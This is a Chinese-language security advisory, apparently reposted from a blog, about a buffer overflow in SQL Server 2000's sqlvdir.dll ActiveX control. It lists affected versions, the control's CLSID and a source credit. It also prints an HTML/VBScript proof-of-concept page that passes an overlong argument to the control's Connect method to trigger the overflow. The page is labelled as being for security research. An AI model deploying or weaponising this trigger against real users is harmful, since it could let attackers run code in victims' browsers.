Microsoft SQL Server sqlvdir.dll ActiveX控件缓冲区溢出漏洞
Microsoft SQL Server sqlvdir.dll ActiveX控件缓冲区溢出漏洞 |
受影响系统: Microsoft SQL Server 2000 SP4 Microsoft SQL Server 2000 SP3a Microsoft SQL Server 2000 SP3 Microsoft SQL Server 2000 SP2 Microsoft SQL Server 2000 SP1 Microsoft SQL Server 2000 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 31129 Microsoft SQL Server是一款流行的SQL数据库系统。 SQL Server所安装的sqlvdir.dll ActiveX控件(默认路径为C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll,clsid:FC13BAA2-9C1A-4069-A221-31A147636038)所暴露的ISQLVDirControl接口没有正确的验证用户输入参数,如果用户受骗访问了恶意网页并向该方式传送了超长参数的话,就可能触发缓冲区溢出,导致执行任意代码。 <*来源:Beenu Arora (beenudel1986@gmail.com) 链接http://marc.info/?l=bugtraq&m=122115323714605&w=2 *> 测试方法: -------------------------------------------------------------------------------- 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <html> Test Exploit page <object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target' ></object> <script language='vbscript'> targetFile = "C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll" prototype = "Sub Connect ( [ ByVal szServer As Variant ] , [ ByVal szWebSite As Variant ] )" memberName = "Connect" progid = "SQLVDIRLib.SQLVDirControl" argCount = 2 arg1="defaultV" arg2="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\" target.Connect arg1 ,arg2 </script> 建议: -------------------------------------------------------------------------------- 厂商补丁: Microsoft --------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.microsoft.com/technet/security/ |
http://hi.baidu.com/isbx/blog/item/28041b4ca06c7bffd62afc03.html
加支付宝好友偷能量挖...